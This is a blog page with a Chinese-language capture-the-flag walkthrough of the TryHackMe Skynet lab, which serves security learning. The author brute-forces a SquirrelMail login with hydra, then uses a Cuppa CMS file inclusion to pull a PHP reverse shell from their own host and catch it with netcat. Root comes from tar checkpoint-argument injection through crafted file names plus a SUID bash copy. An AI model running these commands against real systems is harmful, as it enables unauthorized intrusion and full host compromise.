<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Saofe1a">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/04/12/【thm】skynet靶场/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="nmap -p- -sC -sV -T4 -v 10.10.146.19 139&#x2F;445端口开放，可知目标机开启了SMB服务 对SMB服务的账号信息进行扫描smbclient -L \\10.10.146.19（让你输入密码直接按回车）或enum4linux -S 10.10.146.19获取到一些可能能访问的SMB服务账号：anonymous、milesdyson使用命令连接SMB服务">
<meta property="og:type" content="article">
<meta property="og:title" content="【THM】Skynet靶场">
<meta property="og:url" content="http://example.com/2025/04/12/%E3%80%90THM%E3%80%91Skynet%E9%9D%B6%E5%9C%BA/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="nmap -p- -sC -sV -T4 -v 10.10.146.19 139&#x2F;445端口开放，可知目标机开启了SMB服务 对SMB服务的账号信息进行扫描smbclient -L \\10.10.146.19（让你输入密码直接按回车）或enum4linux -S 10.10.146.19获取到一些可能能访问的SMB服务账号：anonymous、milesdyson使用命令连接SMB服务">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-5edc08124009ba95b52f70845af3a131_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-173c29037e484ccca5bcc6246b441fcf_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-d0ac1b912703446d6ad0a018609707fe_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-66aa81121460d1082a9e95f592959849_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-e81cc1545ead747eb4ef7410900796ae_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-fa7d4341a7c305fad2d925a2161e80d0_1440w.webp">
<meta property="og:image" content="https://pic2.zhimg.com/80/v2-f0b689e10d6c1b687dd02826e324b7f3_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-77a6c0eaebfd6cba3f5b7f5b0ae348c6_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-d21ad9d897fa316fdba992e6c287938a_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-1f44d89e8df80666b1368a79da079e76_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-6cdd6f517fd21cde5eb6d75b174f8c90_1440w.webp">
<meta property="og:image" content="https://pic2.zhimg.com/80/v2-f1986b03dc836742916267546eaab52f_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-09880b014892df3cb34527c1f767f271_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-e91626ce68b80cd62536eac3181b2586_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-38e8a5570a90439c02e4fcd05dc0ce75_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-7e3194a1c59ecda8a2563beccb7e6721_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-67456b351c3a96851df1d2af92988641_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-be45419eac46c383aa092218c0ef7952_1440w.webp">
<meta property="article:published_time" content="2025-04-12T13:37:27.708Z">
<meta property="article:modified_time" content="2025-04-12T13:37:07.062Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic4.zhimg.com/80/v2-5edc08124009ba95b52f70845af3a131_1440w.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/chelsea.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/chelsea.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/chelsea.png">
    <!--- Page Info-->
    
    <title>
        
            【THM】Skynet靶场 -
        
        Saofe1a
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    

    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Saofe1a","subtitle":{"text":["Better late than never","感谢所有在CTF道路上帮助过我的师傅们","Man proposes,God disposes"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.4","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives/","icon":"fa-regular fa-archive"},"About":{"path":"/about/","icon":"fa-regular fa-user"},"Links":{"path":"/links/","icon":"fa-regular fa-link"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Saofe1a
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Saofe1a
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives/"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/about/"
                                        >
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/links/"
                                        >
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives/"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/about/"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-regular fa-user fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/links/"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-regular fa-link fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">13</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">【THM】Skynet靶场</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/touxiang.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">Saofe1a</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-04-12 21:37:27</span>
        <span class="mobile">2025-04-12 21:37:27</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-04-12 21:37:07</span>
            <span class="mobile">2025-04-12 21:37:07</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>978 Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>4 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p><code>nmap -p- -sC -sV -T4 -v 10.10.146.19</code></p>
<p>139&#x2F;445端口开放，可知目标机开启了SMB服务</p>
<p>对SMB服务的账号信息进行扫描<br><code>smbclient -L \\10.10.146.19</code>（让你输入密码直接按回车）<br>或<code>enum4linux -S 10.10.146.19</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-5edc08124009ba95b52f70845af3a131_1440w.webp"
                      alt="Pasted image 20250412162735.png"
                ><br>获取到一些可能能访问的SMB服务账号：anonymous、milesdyson<br>使用命令连接SMB服务中的匿名账户并获取所需文件<br><code>smbclient //10.10.146.19/anonymous</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-173c29037e484ccca5bcc6246b441fcf_1440w.webp"
                      alt="Pasted image 20250412163001.png"
                ><br>attention.txt的内容如下，所以最近可能发生过密码更改行为，根据文本内容中的署名及SMB服务账户名称–管理员账户为milesdyson<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-d0ac1b912703446d6ad0a018609707fe_1440w.webp"
                      alt="Pasted image 20250412163045.png"
                ><br>log2和log3为空，log1.txt应该是密码记录<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-66aa81121460d1082a9e95f592959849_1440w.webp"
                      alt="Pasted image 20250412163223.png"
                ><br>用户名和密码都有了，那么我们找到登录点就可以进行爆破了</p>
<p>使用gobuster扫描目录<br><code>gobuster dir -u http://10.10.146.19/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-e81cc1545ead747eb4ef7410900796ae_1440w.webp"
                      alt="Pasted image 20250412165228.png"
                ><br>扫出目标站点的二级目录&#x2F;squirrelmail（10.10.146.19&#x2F;squirrelmail）结果会自动跳转至&#x2F;squirrelmail&#x2F;src&#x2F;login.php页面<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-fa7d4341a7c305fad2d925a2161e80d0_1440w.webp"
                      alt="Pasted image 20250412164733.png"
                ><br>使用hydra爆破密码，注意这是post传参<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic2.zhimg.com/80/v2-f0b689e10d6c1b687dd02826e324b7f3_1440w.webp"
                      alt="Pasted image 20250412165613.png"
                ><br><code>hydra -l milesdyson -P log1.txt 10.10.146.19 http-form-post &quot;/squirrelmail/src/redirect.php:login_username=milesdyson&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=1:F=Unknown User or password incorrect.&quot;</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-77a6c0eaebfd6cba3f5b7f5b0ae348c6_1440w.webp"
                      alt="Pasted image 20250412170939.png"
                ><br>破解得到的结果：milesdyson cyborg007haloterminator 登录进去<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-d21ad9d897fa316fdba992e6c287938a_1440w.webp"
                      alt="Pasted image 20250412171115.png"
                ><br>由邮件信息可知，SMB账户milesdyson的新密码为：)s{A&amp;2Z&#x3D;F^n_E.B&#96;</p>
<p>登录SMB账户<br><code>smbclient -U milesdyson //10.10.146.19/milesdyson</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-1f44d89e8df80666b1368a79da079e76_1440w.webp"
                      alt="Pasted image 20250412171811.png"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-6cdd6f517fd21cde5eb6d75b174f8c90_1440w.webp"
                      alt="Pasted image 20250412171844.png"
                ><br>获取到的有效信息：二级目录&#x2F;45kra24zxs28v3yd<br>二级目录打开后并没有可利用的点，我们继续扫描他的子目录<br><code>gobuster dir -u http://10.10.146.19/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error</code><br>得到&#x2F;administrator<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic2.zhimg.com/80/v2-f1986b03dc836742916267546eaab52f_1440w.webp"
                      alt="Pasted image 20250412172225.png"
                ><br>CMS信息：Cuppa CMS<br>在<a class="link"   target="_blank" rel="noopener" href="https://www.exploit-db.com/%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97Cuppa%E4%BB%A5%E6%9F%A5%E6%89%BECuppa" >https://www.exploit-db.com/上搜索关键字Cuppa以查找Cuppa <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> CMS相关的漏洞exp<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-09880b014892df3cb34527c1f767f271_1440w.webp"
                      alt="Pasted image 20250412172530.png"
                ></p>
<p>主播中途干别的事情了，所以重启了靶机，换了ip<br><code>http://10.10.141.199/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.105.250:8000/php-reverse-shell.php</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-e91626ce68b80cd62536eac3181b2586_1440w.webp"
                      alt="Pasted image 20250412204001.png"
                ><br>python3 -m http.server 8000<br>nc -lvnp 1234<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-38e8a5570a90439c02e4fcd05dc0ce75_1440w.webp"
                      alt="Pasted image 20250412203801.png"
                ><br>然后我们需要提权，尝试查找可利用的suid文件或者root权限的二进制文件无果<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-7e3194a1c59ecda8a2563beccb7e6721_1440w.webp"
                      alt="Pasted image 20250412205542.png"
                ><br>backups目录下有一个backup.sh文件，作用是切换目录至&#x2F;var&#x2F;www&#x2F;html 并将该目录下的所有内容归档为backup.tgz压缩文件，该tgz文件保存在backups目录下<br>查看&#x2F;etc&#x2F;crontab即定时任务可知backup.sh文件是一个定时任务，该.sh脚本每分钟都会以root身份执行</p>
<p>在查询 GTFOBins 网站后，我们发现由于backups目录下的backup.sh脚本中使用的通配符* 将对 &#x2F;var&#x2F;www&#x2F;html 目录中的所有文件和文件夹执行归档命令，因此我们可以通过在&#x2F;var&#x2F;www&#x2F;html下添加–checkpoint&#x3D;1 文件（以启用检查点功能）和 –checkpoint 来利用它-action&#x3D;exec&#x3D;&#x2F;tmp&#x2F;nroot.sh 文件（指定要执行的操作），当 tar 遇到它们时，它将被有效地视为参数</p>
<p>在&#x2F;var&#x2F;www&#x2F;html目录下创建一个BASH脚本，如果<code>/bin/bash</code> 被赋予 SetUID 或 SetGID 权限，并且文件所有者是 root，那么任何用户执行 <code>/bin/bash</code> 都将获得 root 权限，该脚本将创建一个实质为bash副本的 SUID 二进制文件，chmod +s &#x2F;tmp&#x2F;nroot是给<code>/tmp/nroot</code> 文件设置SUID位，SUID位允许文件以文件所有者的权限运行<br><code>echo &quot;cp /bin/bash /tmp/nroot &amp;&amp; chmod +s /tmp/nroot&quot; &gt; newroot.sh</code><br>执行命令来创建两个文件，它们实际上是 tar 命令行实用程序的参数:</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch &quot;/var/www/html/--checkpoint=1&quot;</span><br><span class="line">touch &quot;/var/www/html/--checkpoint-action=exec=sh newroot.sh&quot;</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-67456b351c3a96851df1d2af92988641_1440w.webp"
                      alt="Pasted image 20250412210207.png"
                ><br>大约一分钟后，cron 作业运行并创建了 BASH 的“nroot”SUID 副本。在使用 -p 标志执行它后，它允许以它的所有者身份执行二进制文件，这将授予对主机的 root 访问权限：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">ls</span><br><span class="line">/tmp/nroot -p</span><br><span class="line">whoami</span><br><span class="line">cd /root</span><br><span class="line">cat root.txt</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-be45419eac46c383aa092218c0ef7952_1440w.webp"
                      alt="Pasted image 20250412212349.png"
                ></p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 【THM】Skynet靶场</li>
        <li><strong>Author:</strong> Saofe1a</li>
        <li><strong>Created at
                :</strong> 2025-04-12 21:37:27</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-04-12 21:37:07
            </li>
        
        <li>
            <strong>Link:</strong> https://saofeia.github.io/2025/04/12/【THM】Skynet靶场/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2025/05/09/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Tsclient/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">春秋云镜-Tsclient</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2025/04/07/%E5%8F%8D%E5%90%91%20SSH%20%E6%9A%B4%E9%9C%B2%E9%9A%90%E8%97%8F%E6%9C%8D%E5%8A%A1/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">反向 SSH 暴露隐藏服务</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">【THM】Skynet靶场</div>
        

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
